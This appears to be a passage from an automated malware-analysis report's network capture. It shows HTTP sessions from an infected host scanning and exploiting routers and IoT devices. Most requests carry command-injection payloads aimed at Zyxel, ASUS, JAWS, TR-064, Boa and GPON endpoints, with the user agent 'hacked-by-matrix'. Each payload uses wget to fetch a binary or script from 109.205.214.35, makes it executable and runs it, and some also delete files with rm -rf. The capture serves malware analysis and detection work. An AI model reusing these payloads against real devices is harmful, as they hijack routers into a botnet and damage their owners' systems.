                                                        Data Raw: 20 72 65 6d 6f 74 65 5f 73 75 62 6d 69 74 5f 46 6c 61 67 3d 31 26 72 65 6d 6f 74 65 5f 73 79 73 6c 6f 67 5f 46 6c 61 67 3d 31 26 52 65 6d 6f 74 65 53 79 73 6c 6f 67 53 75 70 70 6f 72 74 65 64 3d 31 26 4c 6f 67 46 6c 61 67 3d 30 26 72 65 6d 6f 74 65 5f 68 6f 73 74 3d 25 33 62 63 64 2b 2f 74 6d 70 3b 77 67 65 74 2b 68 74 74 70 3a 2f 2f 31 30 39 2e 32 30 35 2e 32 31 34 2e 33 35 2f 61 72 6d 37 3b 63 68 6d 6f 64 2b 37 37 37 2b 61 72 6d 37 3b 2e 2f 61 72 6d 37 20 7a 79 78 65 6c 3b 72 6d 2b 2d 72 66 2b 61 72 6d 37 25 33 62 25 32 33 26 72 65 6d 6f 74 65 53 75 62 6d 69 74 3d 53 61 76 65 0d 0a 0d 0a
                                                        Data Ascii: remote_submit_Flag=1&remote_syslog_Flag=1&RemoteSyslogSupported=1&LogFlag=0&remote_host=%3bcd+/tmp;wget+http://109.205.214.35/arm7;chmod+777+arm7;./arm7 zyxel;rm+-rf+arm7%3b%23&remoteSubmit=Save
                                                        Mar 21, 2024 05:23:48.103069067 CET429INHTTP/1.0 400 Bad Request
                                                        Server: AkamaiGHost
                                                        Mime-Version: 1.0
                                                        Content-Type: text/html
                                                        Content-Length: 207
                                                        Expires: Thu, 21 Mar 2024 04:23:47 GMT
                                                        Date: Thu, 21 Mar 2024 04:23:47 GMT
                                                        Connection: close
                                                        Data Raw: 3c 48 54 4d 4c 3e 3c 48 45 41 44 3e 0a 3c 54 49 54 4c 45 3e 49 6e 76 61 6c 69 64 20 55 52 4c 3c 2f 54 49 54 4c 45 3e 0a 3c 2f 48 45 41 44 3e 3c 42 4f 44 59 3e 0a 3c 48 31 3e 49 6e 76 61 6c 69 64 20 55 52 4c 3c 2f 48 31 3e 0a 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 22 26 23 39 31 3b 6e 6f 26 23 33 32 3b 55 52 4c 26 23 39 33 3b 22 2c 20 69 73 20 69 6e 76 61 6c 69 64 2e 3c 70 3e 0a 52 65 66 65 72 65 6e 63 65 26 23 33 32 3b 26 23 33 35 3b 39 26 23 34 36 3b 65 32 36 38 62 64 35 26 23 34 36 3b 31 37 31 30 39 39 35 30 32 37 26 23 34 36 3b 38 66 63 66 38 38 35 0a 3c 2f 42 4f 44 59 3e 3c 2f 48 54 4d 4c 3e 0a
                                                        Data Ascii: <HTML><HEAD><TITLE>Invalid URL</TITLE></HEAD><BODY><H1>Invalid URL</H1>The requested URL "&#91;no&#32;URL&#93;", is invalid.<p>Reference&#32;&#35;9&#46;e268bd5&#46;1710995027&#46;8fcf885</BODY></HTML>


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        2036192.168.2.1358734172.64.90.2228080
                                                        TimestampBytes transferredDirectionData
                                                        Mar 21, 2024 05:23:42.676022053 CET122OUTPOST /tmUnblock.cgi cd /tmp; rm -rf mpsl; wget http://109.205.214.35/mpsl;chmod 777 *;./mpsl asus;sh mpsl asu
                                                        Data Raw:
                                                        Data Ascii:
                                                        Mar 21, 2024 05:23:43.185740948 CET122OUTPOST /tmUnblock.cgi cd /tmp; rm -rf mpsl; wget http://109.205.214.35/mpsl;chmod 777 *;./mpsl asus;sh mpsl asu
                                                        Data Raw:
                                                        Data Ascii:


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        2037192.168.2.135302223.50.218.16380
                                                        TimestampBytes transferredDirectionData
                                                        Mar 21, 2024 05:23:42.774602890 CET271OUTGET /shell?cd+/tmp;rm+-rf+*;wget+ 109.205.214.35/arm;chmod+777+/tmp/arm;sh+/tmp/arm4 jawsHTTP/1.1
                                                        User-Agent: hacked-by-matrix
                                                        Host: 127.0.0.1:80
                                                        Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8
                                                        Connection: keep-alive
                                                        Mar 21, 2024 05:23:43.088232994 CET438INHTTP/1.0 400 Bad Request
                                                        Server: AkamaiGHost
                                                        Mime-Version: 1.0
                                                        Content-Type: text/html
                                                        Content-Length: 216
                                                        Expires: Thu, 21 Mar 2024 04:23:42 GMT
                                                        Date: Thu, 21 Mar 2024 04:23:42 GMT
                                                        Connection: close
                                                        Data Raw: 3c 48 54 4d 4c 3e 3c 48 45 41 44 3e 0a 3c 54 49 54 4c 45 3e 42 61 64 20 52 65 71 75 65 73 74 3c 2f 54 49 54 4c 45 3e 0a 3c 2f 48 45 41 44 3e 3c 42 4f 44 59 3e 0a 3c 48 31 3e 42 61 64 20 52 65 71 75 65 73 74 3c 2f 48 31 3e 0a 59 6f 75 72 20 62 72 6f 77 73 65 72 20 73 65 6e 74 20 61 20 72 65 71 75 65 73 74 20 74 68 61 74 20 74 68 69 73 20 73 65 72 76 65 72 20 63 6f 75 6c 64 20 6e 6f 74 20 75 6e 64 65 72 73 74 61 6e 64 2e 3c 50 3e 0a 52 65 66 65 72 65 6e 63 65 26 23 33 32 3b 26 23 33 35 3b 37 26 23 34 36 3b 33 36 61 38 33 30 31 37 26 23 34 36 3b 31 37 31 30 39 39 35 30 32 32 26 23 34 36 3b 30 0a 3c 2f 42 4f 44 59 3e 0a 3c 2f 48 54 4d 4c 3e 0a
                                                        Data Ascii: <HTML><HEAD><TITLE>Bad Request</TITLE></HEAD><BODY><H1>Bad Request</H1>Your browser sent a request that this server could not understand.<P>Reference&#32;&#35;7&#46;36a83017&#46;1710995022&#46;0</BODY></HTML>
                                                        Mar 21, 2024 05:23:44.812381029 CET438INHTTP/1.0 400 Bad Request
                                                        Server: AkamaiGHost
                                                        Mime-Version: 1.0
                                                        Content-Type: text/html
                                                        Content-Length: 216
                                                        Expires: Thu, 21 Mar 2024 04:23:42 GMT
                                                        Date: Thu, 21 Mar 2024 04:23:42 GMT
                                                        Connection: close
                                                        Data Raw: 3c 48 54 4d 4c 3e 3c 48 45 41 44 3e 0a 3c 54 49 54 4c 45 3e 42 61 64 20 52 65 71 75 65 73 74 3c 2f 54 49 54 4c 45 3e 0a 3c 2f 48 45 41 44 3e 3c 42 4f 44 59 3e 0a 3c 48 31 3e 42 61 64 20 52 65 71 75 65 73 74 3c 2f 48 31 3e 0a 59 6f 75 72 20 62 72 6f 77 73 65 72 20 73 65 6e 74 20 61 20 72 65 71 75 65 73 74 20 74 68 61 74 20 74 68 69 73 20 73 65 72 76 65 72 20 63 6f 75 6c 64 20 6e 6f 74 20 75 6e 64 65 72 73 74 61 6e 64 2e 3c 50 3e 0a 52 65 66 65 72 65 6e 63 65 26 23 33 32 3b 26 23 33 35 3b 37 26 23 34 36 3b 33 36 61 38 33 30 31 37 26 23 34 36 3b 31 37 31 30 39 39 35 30 32 32 26 23 34 36 3b 30 0a 3c 2f 42 4f 44 59 3e 0a 3c 2f 48 54 4d 4c 3e 0a
                                                        Data Ascii: <HTML><HEAD><TITLE>Bad Request</TITLE></HEAD><BODY><H1>Bad Request</H1>Your browser sent a request that this server could not understand.<P>Reference&#32;&#35;7&#46;36a83017&#46;1710995022&#46;0</BODY></HTML>


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        2038192.168.2.135919098.168.117.98080
                                                        TimestampBytes transferredDirectionData
                                                        Mar 21, 2024 05:23:42.821384907 CET122OUTPOST /tmUnblock.cgi cd /tmp; rm -rf mpsl; wget http://109.205.214.35/mpsl;chmod 777 *;./mpsl asus;sh mpsl asu
                                                        Data Raw:
                                                        Data Ascii:
                                                        Mar 21, 2024 05:23:42.951327085 CET59INHTTP/1.1 400 Bad Request
                                                        Connection: close


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        2039192.168.2.1337160172.67.129.2208080
                                                        TimestampBytes transferredDirectionData
                                                        Mar 21, 2024 05:23:42.908972979 CET122OUTPOST /tmUnblock.cgi cd /tmp; rm -rf mpsl; wget http://109.205.214.35/mpsl;chmod 777 *;./mpsl asus;sh mpsl asu
                                                        Data Raw:
                                                        Data Ascii:


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        2040192.168.2.1352746172.64.68.1498080
                                                        TimestampBytes transferredDirectionData
                                                        Mar 21, 2024 05:23:42.908998966 CET122OUTPOST /tmUnblock.cgi cd /tmp; rm -rf mpsl; wget http://109.205.214.35/mpsl;chmod 777 *;./mpsl asus;sh mpsl asu
                                                        Data Raw:
                                                        Data Ascii:


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        2041192.168.2.1344406172.67.75.428080
                                                        TimestampBytes transferredDirectionData
                                                        Mar 21, 2024 05:23:42.909013033 CET122OUTPOST /tmUnblock.cgi cd /tmp; rm -rf mpsl; wget http://109.205.214.35/mpsl;chmod 777 *;./mpsl asus;sh mpsl asu
                                                        Data Raw:
                                                        Data Ascii:


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        2042192.168.2.134051494.181.90.1357547
                                                        TimestampBytes transferredDirectionData
                                                        Mar 21, 2024 05:23:42.958856106 CET734OUTPOST /UD/act?1 HTTP/1.1
                                                        Host: 127.0.0.1:7547
                                                        User-Agent: hacked-by-matrix
                                                        SOAPAction: urn:dslforum-org:service:Time:1#SetNTPServers
                                                        Content-Type: text/xml
                                                        Content-Length: 526
                                                        <?xml version="1.0"?><SOAP-ENV:Envelope xmlns:SOAP-ENV="http://schemas.xmlsoap.org/soap/envelope/" SOAP-ENV:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"> <SOAP-ENV:Body> <u:SetNTPServers xmlns:u="urn:dslforum-org:service:Time:1"> <NewNTPServer1>`cd /tmp;wget http://109.205.214.35/mips; chmod 777 mips; ./mips tr064`</NewNTPServer1> <NewNTPServer2></NewNTPServer2> <NewNTPServer3></NewNTPServer3> <NewNTPServer4></NewNTPServer4> <NewNTPServer5></NewNTPServer5> </u:SetNTPServers> </SOAP-ENV:Body></SOAP-ENV:Envelope
                                                        Data Raw:
                                                        Data Ascii:
                                                        Mar 21, 2024 05:23:44.145507097 CET734OUTPOST /UD/act?1 HTTP/1.1
                                                        Host: 127.0.0.1:7547
                                                        User-Agent: hacked-by-matrix
                                                        SOAPAction: urn:dslforum-org:service:Time:1#SetNTPServers
                                                        Content-Type: text/xml
                                                        Content-Length: 526
                                                        <?xml version="1.0"?><SOAP-ENV:Envelope xmlns:SOAP-ENV="http://schemas.xmlsoap.org/soap/envelope/" SOAP-ENV:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"> <SOAP-ENV:Body> <u:SetNTPServers xmlns:u="urn:dslforum-org:service:Time:1"> <NewNTPServer1>`cd /tmp;wget http://109.205.214.35/mips; chmod 777 mips; ./mips tr064`</NewNTPServer1> <NewNTPServer2></NewNTPServer2> <NewNTPServer3></NewNTPServer3> <NewNTPServer4></NewNTPServer4> <NewNTPServer5></NewNTPServer5> </u:SetNTPServers> </SOAP-ENV:Body></SOAP-ENV:Envelope
                                                        Data Raw:
                                                        Data Ascii:
                                                        Mar 21, 2024 05:23:44.366266012 CET197INHTTP/1.1 404 Not Found
                                                        Date: Thu Mar 21 08:23:43 2024
                                                        Server: tr069 http server
                                                        Content-Length: 15
                                                        Connection: close
                                                        Content-Type: text/plain; charset=ISO-8859-1
                                                        Data Raw: 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 0a
                                                        Data Ascii: File not found


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        2043192.168.2.134000247.142.43.2117547
                                                        TimestampBytes transferredDirectionData
                                                        Mar 21, 2024 05:23:42.997241974 CET734OUTPOST /UD/act?1 HTTP/1.1
                                                        Host: 127.0.0.1:7547
                                                        User-Agent: hacked-by-matrix
                                                        SOAPAction: urn:dslforum-org:service:Time:1#SetNTPServers
                                                        Content-Type: text/xml
                                                        Content-Length: 526
                                                        <?xml version="1.0"?><SOAP-ENV:Envelope xmlns:SOAP-ENV="http://schemas.xmlsoap.org/soap/envelope/" SOAP-ENV:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"> <SOAP-ENV:Body> <u:SetNTPServers xmlns:u="urn:dslforum-org:service:Time:1"> <NewNTPServer1>`cd /tmp;wget http://109.205.214.35/mips; chmod 777 mips; ./mips tr064`</NewNTPServer1> <NewNTPServer2></NewNTPServer2> <NewNTPServer3></NewNTPServer3> <NewNTPServer4></NewNTPServer4> <NewNTPServer5></NewNTPServer5> </u:SetNTPServers> </SOAP-ENV:Body></SOAP-ENV:Envelope
                                                        Data Raw:
                                                        Data Ascii:
                                                        Mar 21, 2024 05:23:43.885565996 CET734OUTPOST /UD/act?1 HTTP/1.1
                                                        Host: 127.0.0.1:7547
                                                        User-Agent: hacked-by-matrix
                                                        SOAPAction: urn:dslforum-org:service:Time:1#SetNTPServers
                                                        Content-Type: text/xml
                                                        Content-Length: 526
                                                        <?xml version="1.0"?><SOAP-ENV:Envelope xmlns:SOAP-ENV="http://schemas.xmlsoap.org/soap/envelope/" SOAP-ENV:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"> <SOAP-ENV:Body> <u:SetNTPServers xmlns:u="urn:dslforum-org:service:Time:1"> <NewNTPServer1>`cd /tmp;wget http://109.205.214.35/mips; chmod 777 mips; ./mips tr064`</NewNTPServer1> <NewNTPServer2></NewNTPServer2> <NewNTPServer3></NewNTPServer3> <NewNTPServer4></NewNTPServer4> <NewNTPServer5></NewNTPServer5> </u:SetNTPServers> </SOAP-ENV:Body></SOAP-ENV:Envelope
                                                        Data Raw:
                                                        Data Ascii:
                                                        Mar 21, 2024 05:23:44.908773899 CET734OUTPOST /UD/act?1 HTTP/1.1
                                                        Host: 127.0.0.1:7547
                                                        User-Agent: hacked-by-matrix
                                                        SOAPAction: urn:dslforum-org:service:Time:1#SetNTPServers
                                                        Content-Type: text/xml
                                                        Content-Length: 526
                                                        <?xml version="1.0"?><SOAP-ENV:Envelope xmlns:SOAP-ENV="http://schemas.xmlsoap.org/soap/envelope/" SOAP-ENV:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"> <SOAP-ENV:Body> <u:SetNTPServers xmlns:u="urn:dslforum-org:service:Time:1"> <NewNTPServer1>`cd /tmp;wget http://109.205.214.35/mips; chmod 777 mips; ./mips tr064`</NewNTPServer1> <NewNTPServer2></NewNTPServer2> <NewNTPServer3></NewNTPServer3> <NewNTPServer4></NewNTPServer4> <NewNTPServer5></NewNTPServer5> </u:SetNTPServers> </SOAP-ENV:Body></SOAP-ENV:Envelope
                                                        Data Raw:
                                                        Data Ascii:


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        2044192.168.2.135909423.206.177.17580
                                                        TimestampBytes transferredDirectionData
                                                        Mar 21, 2024 05:23:43.700809002 CET271OUTGET /shell?cd+/tmp;rm+-rf+*;wget+ 109.205.214.35/arm;chmod+777+/tmp/arm;sh+/tmp/arm4 jawsHTTP/1.1
                                                        User-Agent: hacked-by-matrix
                                                        Host: 127.0.0.1:80
                                                        Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8
                                                        Connection: keep-alive
                                                        Mar 21, 2024 05:23:44.237442970 CET271OUTGET /shell?cd+/tmp;rm+-rf+*;wget+ 109.205.214.35/arm;chmod+777+/tmp/arm;sh+/tmp/arm4 jawsHTTP/1.1
                                                        User-Agent: hacked-by-matrix
                                                        Host: 127.0.0.1:80
                                                        Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8
                                                        Connection: keep-alive
                                                        Mar 21, 2024 05:23:44.332113028 CET438INHTTP/1.0 400 Bad Request
                                                        Server: AkamaiGHost
                                                        Mime-Version: 1.0
                                                        Content-Type: text/html
                                                        Content-Length: 216
                                                        Expires: Thu, 21 Mar 2024 04:23:44 GMT
                                                        Date: Thu, 21 Mar 2024 04:23:44 GMT
                                                        Connection: close
                                                        Data Raw: 3c 48 54 4d 4c 3e 3c 48 45 41 44 3e 0a 3c 54 49 54 4c 45 3e 42 61 64 20 52 65 71 75 65 73 74 3c 2f 54 49 54 4c 45 3e 0a 3c 2f 48 45 41 44 3e 3c 42 4f 44 59 3e 0a 3c 48 31 3e 42 61 64 20 52 65 71 75 65 73 74 3c 2f 48 31 3e 0a 59 6f 75 72 20 62 72 6f 77 73 65 72 20 73 65 6e 74 20 61 20 72 65 71 75 65 73 74 20 74 68 61 74 20 74 68 69 73 20 73 65 72 76 65 72 20 63 6f 75 6c 64 20 6e 6f 74 20 75 6e 64 65 72 73 74 61 6e 64 2e 3c 50 3e 0a 52 65 66 65 72 65 6e 63 65 26 23 33 32 3b 26 23 33 35 3b 37 26 23 34 36 3b 34 66 65 66 32 65 31 37 26 23 34 36 3b 31 37 31 30 39 39 35 30 32 34 26 23 34 36 3b 30 0a 3c 2f 42 4f 44 59 3e 0a 3c 2f 48 54 4d 4c 3e 0a
                                                        Data Ascii: <HTML><HEAD><TITLE>Bad Request</TITLE></HEAD><BODY><H1>Bad Request</H1>Your browser sent a request that this server could not understand.<P>Reference&#32;&#35;7&#46;4fef2e17&#46;1710995024&#46;0</BODY></HTML>


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        2045192.168.2.1339516173.194.67.15180
                                                        TimestampBytes transferredDirectionData
                                                        Mar 21, 2024 05:23:43.724850893 CET271OUTGET /shell?cd+/tmp;rm+-rf+*;wget+ 109.205.214.35/arm;chmod+777+/tmp/arm;sh+/tmp/arm4 jawsHTTP/1.1
                                                        User-Agent: hacked-by-matrix
                                                        Host: 127.0.0.1:80
                                                        Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8
                                                        Connection: keep-alive
                                                        Mar 21, 2024 05:23:43.854213953 CET1286INHTTP/1.0 400 Bad Request
                                                        Content-Type: text/html; charset=UTF-8
                                                        Referrer-Policy: no-referrer
                                                        Content-Length: 1555
                                                        Date: Thu, 21 Mar 2024 04:23:43 GMT
                                                        Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 65 6e 3e 0a 20 20 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 75 74 66 2d 38 3e 0a 20 20 3c 6d 65 74 61 20 6e 61 6d 65 3d 76 69 65 77 70 6f 72 74 20 63 6f 6e 74 65 6e 74 3d 22 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2c 20 6d 69 6e 69 6d 75 6d 2d 73 63 61 6c 65 3d 31 2c 20 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 22 3e 0a 20 20 3c 74 69 74 6c 65 3e 45 72 72 6f 72 20 34 30 30 20 28 42 61 64 20 52 65 71 75 65 73 74 29 21 21 31 3c 2f 74 69 74 6c 65 3e 0a 20 20 3c 73 74 79 6c 65 3e 0a 20 20 20 20 2a 7b 6d 61 72 67 69 6e 3a 30 3b 70 61 64 64 69 6e 67 3a 30 7d 68 74 6d 6c 2c 63 6f 64 65 7b 66 6f 6e 74 3a 31 35 70 78 2f 32 32 70 78 20 61 72 69 61 6c 2c 73 61 6e 73 2d 73 65 72 69 66 7d 68 74 6d 6c 7b 62 61 63 6b 67 72 6f 75 6e 64 3a 23 66 66 66 3b 63 6f 6c 6f 72 3a 23 32 32 32 3b 70 61 64 64 69 6e 67 3a 31 35 70 78 7d 62 6f 64 79 7b 6d 61 72 67 69 6e 3a 37 25 20 61 75 74 6f 20 30 3b 6d 61 78 2d 77 69 64 74 68 3a 33 39 30 70 78 3b 6d 69 6e 2d 68 65 69 67 68 74 3a 31 38 30 70 78 3b 70 61 64 64 69 6e 67 3a 33 30 70 78 20 30 20 31 35 70 78 7d 2a 20 3e 20 62 6f 64 79 7b 62 61 63 6b 67 72 6f 75 6e 64 3a 75 72 6c 28 2f 2f 77 77 77 2e 67 6f 6f 67 6c 65 2e 63 6f 6d 2f 69 6d 61 67 65 73 2f 65 72 72 6f 72 73 2f 72 6f 62 6f 74 2e 70 6e 67 29 20 31 30 30 25 20 35 70 78 20 6e 6f 2d 72 65 70 65 61 74 3b 70 61 64 64 69 6e 67 2d 72 69 67 68 74 3a 32 30 35 70 78 7d 70 7b 6d 61 72 67 69 6e 3a 31 31 70 78 20 30 20 32 32 70 78 3b 6f 76 65 72 66 6c 6f 77 3a 68 69 64 64 65 6e 7d 69 6e 73 7b 63 6f 6c 6f 72 3a 23 37 37 37 3b 74 65 78 74 2d 64 65 63 6f 72 61 74 69 6f 6e 3a 6e 6f 6e 65 7d 61 20 69 6d 67 7b 62 6f 72 64 65 72 3a 30 7d 40 6d 65 64 69 61 20 73 63 72 65 65 6e 20 61 6e 64 20 28 6d 61 78 2d 77 69 64 74 68 3a 37 37 32 70 78 29 7b 62 6f 64 79 7b 62 61 63 6b 67 72 6f 75 6e 64 3a 6e 6f 6e 65 3b 6d 61 72 67 69 6e 2d 74 6f 70 3a 30 3b 6d 61 78 2d 77 69 64 74 68 3a 6e 6f 6e 65 3b 70 61 64 64 69 6e 67 2d 72 69 67 68 74 3a 30 7d 7d 23 6c 6f 67 6f 7b 62 61 63 6b 67 72 6f 75 6e 64 3a 75 72 6c 28 2f 2f 77 77 77 2e 67 6f 6f 67 6c 65 2e 63 6f 6d 2f 69 6d 61 67 65 73 2f 62 72 61 6e 64 69 6e 67 2f 67 6f 6f 67 6c 65 6c 6f 67 6f 2f 31 78 2f 67 6f 6f 67 6c 65 6c 6f 67 6f 5f 63 6f 6c 6f 72 5f 31 35 30 78 35 34 64 70 2e 70 6e 67 29 20 6e 6f 2d 72 65 70 65 61 74 3b 6d 61 72 67 69 6e 2d 6c 65 66 74 3a 2d 35 70 78 7d 40 6d 65 64 69 61 20 6f 6e 6c 79 20 73 63 72 65 65 6e 20 61 6e 64 20 28 6d 69 6e 2d 72 65 73 6f 6c 75 74 69 6f 6e 3a 31 39 32 64 70 69 29 7b 23 6c 6f 67 6f 7b 62 61 63 6b 67 72 6f 75 6e 64 3a 75 72 6c 28 2f 2f 77 77 77 2e 67 6f 6f 67 6c 65 2e 63 6f 6d 2f 69 6d 61 67 65 73 2f 62 72 61 6e 64 69 6e 67 2f 67 6f 6f 67 6c 65 6c 6f 67 6f 2f 32 78 2f 67 6f 6f 67 6c 65 6c 6f 67 6f 5f 63 6f 6c 6f 72 5f 31 35 30 78 35 34 64 70 2e 70 6e 67 29 20 6e 6f 2d 72 65 70 65 61 74 20 30 25 20 30 25 2f 31 30 30 25 20 31 30 30 25 3b 2d 6d 6f 7a 2d 62 6f 72 64 65 72 2d 69 6d 61 67 65 3a 75 72 6c 28 2f 2f 77 77 77 2e 67 6f 6f 67 6c 65 2e 63 6f 6d 2f 69 6d 61 67 65 73 2f 62 72 61 6e 64 69 6e 67 2f 67 6f 6f 67 6c 65 6c 6f 67 6f 2f 32 78 2f 67 6f 6f 67 6c 65 6c 6f 67 6f 5f 63 6f 6c 6f 72 5f 31 35 30 78 35 34 64 70 2e 70 6e 67 29 20 30 7d 7d 40 6d 65 64 69 61 20 6f 6e 6c 79 20 73 63 72 65 65 6e 20 61 6e 64 20 28 2d 77 65 62 6b 69 74 2d 6d 69 6e 2d 64 65 76 69
                                                        Data Ascii: <!DOCTYPE html><html lang=en> <meta charset=utf-8> <meta name=viewport content="initial-scale=1, minimum-scale=1, width=device-width"> <title>Error 400 (Bad Request)!!1</title> <style> *{margin:0;padding:0}html,code{font:15px/22px arial,sans-serif}html{background:#fff;color:#222;padding:15px}body{margin:7% auto 0;max-width:390px;min-height:180px;padding:30px 0 15px}* > body{background:url(//www.google.com/images/errors/robot.png) 100% 5px no-repeat;padding-right:205px}p{margin:11px 0 22px;overflow:hidden}ins{color:#777;text-decoration:none}a img{border:0}@media screen and (max-width:772px){body{background:none;margin-top:0;max-width:none;padding-right:0}}#logo{background:url(//www.google.com/images/branding/googlelogo/1x/googlelogo_color_150x54dp.png) no-repeat;margin-left:-5px}@media only screen and (min-resolution:192dpi){#logo{background:url(//www.google.com/images/branding/googlelogo/2x/googlelogo_color_150x54dp.png) no-repeat 0% 0%/100% 100%;-moz-border-image:url(//www.google.com/images/branding/googlelogo/2x/googlelogo_color_150x54dp.png) 0}}@media only screen and (-webkit-min-devi
                                                        Mar 21, 2024 05:23:43.854249001 CET450INData Raw: 63 65 2d 70 69 78 65 6c 2d 72 61 74 69 6f 3a 32 29 7b 23 6c 6f 67 6f 7b 62 61 63 6b 67 72 6f 75 6e 64 3a 75 72 6c 28 2f 2f 77 77 77 2e 67 6f 6f 67 6c 65 2e 63 6f 6d 2f 69 6d 61 67 65 73 2f 62 72 61 6e 64 69 6e 67 2f 67 6f 6f 67 6c 65 6c 6f 67 6f
                                                        Data Ascii: ce-pixel-ratio:2){#logo{background:url(//www.google.com/images/branding/googlelogo/2x/googlelogo_color_150x54dp.png) no-repeat;-webkit-background-size:100% 100%}}#logo{display:inline-block;height:54px;width:150px} </style> <a href=//www.go


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        2046192.168.2.1346246104.83.204.3780
                                                        TimestampBytes transferredDirectionData
                                                        Mar 21, 2024 05:23:43.767483950 CET271OUTGET /shell?cd+/tmp;rm+-rf+*;wget+ 109.205.214.35/arm;chmod+777+/tmp/arm;sh+/tmp/arm4 jawsHTTP/1.1
                                                        User-Agent: hacked-by-matrix
                                                        Host: 127.0.0.1:80
                                                        Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8
                                                        Connection: keep-alive
                                                        Mar 21, 2024 05:23:44.068591118 CET438INHTTP/1.0 400 Bad Request
                                                        Server: AkamaiGHost
                                                        Mime-Version: 1.0
                                                        Content-Type: text/html
                                                        Content-Length: 216
                                                        Expires: Thu, 21 Mar 2024 04:23:43 GMT
                                                        Date: Thu, 21 Mar 2024 04:23:43 GMT
                                                        Connection: close
                                                        Data Raw: 3c 48 54 4d 4c 3e 3c 48 45 41 44 3e 0a 3c 54 49 54 4c 45 3e 42 61 64 20 52 65 71 75 65 73 74 3c 2f 54 49 54 4c 45 3e 0a 3c 2f 48 45 41 44 3e 3c 42 4f 44 59 3e 0a 3c 48 31 3e 42 61 64 20 52 65 71 75 65 73 74 3c 2f 48 31 3e 0a 59 6f 75 72 20 62 72 6f 77 73 65 72 20 73 65 6e 74 20 61 20 72 65 71 75 65 73 74 20 74 68 61 74 20 74 68 69 73 20 73 65 72 76 65 72 20 63 6f 75 6c 64 20 6e 6f 74 20 75 6e 64 65 72 73 74 61 6e 64 2e 3c 50 3e 0a 52 65 66 65 72 65 6e 63 65 26 23 33 32 3b 26 23 33 35 3b 37 26 23 34 36 3b 34 36 39 63 33 65 31 37 26 23 34 36 3b 31 37 31 30 39 39 35 30 32 33 26 23 34 36 3b 30 0a 3c 2f 42 4f 44 59 3e 0a 3c 2f 48 54 4d 4c 3e 0a
                                                        Data Ascii: <HTML><HEAD><TITLE>Bad Request</TITLE></HEAD><BODY><H1>Bad Request</H1>Your browser sent a request that this server could not understand.<P>Reference&#32;&#35;7&#46;469c3e17&#46;1710995023&#46;0</BODY></HTML>


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        2047192.168.2.1347574172.67.6.28080
                                                        TimestampBytes transferredDirectionData
                                                        Mar 21, 2024 05:23:43.788172007 CET122OUTPOST /tmUnblock.cgi cd /tmp; rm -rf mpsl; wget http://109.205.214.35/mpsl;chmod 777 *;./mpsl asus;sh mpsl asu
                                                        Data Raw:
                                                        Data Ascii:
                                                        Mar 21, 2024 05:23:44.301359892 CET122OUTPOST /tmUnblock.cgi cd /tmp; rm -rf mpsl; wget http://109.205.214.35/mpsl;chmod 777 *;./mpsl asus;sh mpsl asu
                                                        Data Raw:
                                                        Data Ascii:


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        2048192.168.2.1337860213.21.11.361723
                                                        TimestampBytes transferredDirectionData
                                                        Mar 21, 2024 05:23:43.859296083 CET282OUTGET /boaform/admin/formPing?target_addr=;wget%20http://109.205.214.35/matrixexp.sh%20-O%20-%3E%20/tmp/matrix;sh%20/tmp/matrix%27/&waninf=1_INTERNET_R_VID_154$ HTTP/1.1
                                                        Connection: keep-alive
                                                        Accept-Encoding: gzip, deflate
                                                        Accept: */*
                                                        User-Agent: hacked-by-matrix


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        2049192.168.2.1357138109.3.175.177443
                                                        TimestampBytes transferredDirectionData
                                                        Mar 21, 2024 05:23:43.877645016 CET324OUTPOST /GponForm/diag_Form?style/ HTTP/1.1
                                                        User-Agent: hacked-by-matrix
                                                        Accept: */*
                                                        Accept-Encoding: gzip, deflate
                                                        Content-Type: application/x-www-form-urlencoded
                                                        Data Raw: 58 57 65 62 50 61 67 65 4e 61 6d 65 3d 64 69 61 67 26 64 69 61 67 5f 61 63 74 69 6f 6e 3d 70 69 6e 67 26 77 61 6e 5f 63 6f 6e 6c 69 73 74 3d 30 26 64 65 73 74 5f 68 6f 73 74 3d 60 62 75 73 79 62 6f 78 2b 77 67 65 74 2b 68 74 74 70 3a 2f 2f 31 30 39 2e 32 30 35 2e 32 31 34 2e 33 35 2f 6d 61 74 72 69 78 65 78 70 2e 73 68 2b 2d 4f 2b 2f 74 6d 70 2f 6d 61 74 72 69 78 3b 73 68 2b 2f 74 6d 70 2f 6d 61 74 72 69 78 60 26 69 70 76 3d 30
                                                        Data Ascii: XWebPageName=diag&diag_action=ping&wan_conlist=0&dest_host=`busybox+wget+http://109.205.214.35/matrixexp.sh+-O+/tmp/matrix;sh+/tmp/matrix`&ipv=0


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        2050192.168.2.1334142118.83.187.54443
                                                        TimestampBytes transferredDirectionData
                                                        Mar 21, 2024 05:23:43.877645016 CET324OUTPOST /GponForm/diag_Form?style/ HTTP/1.1
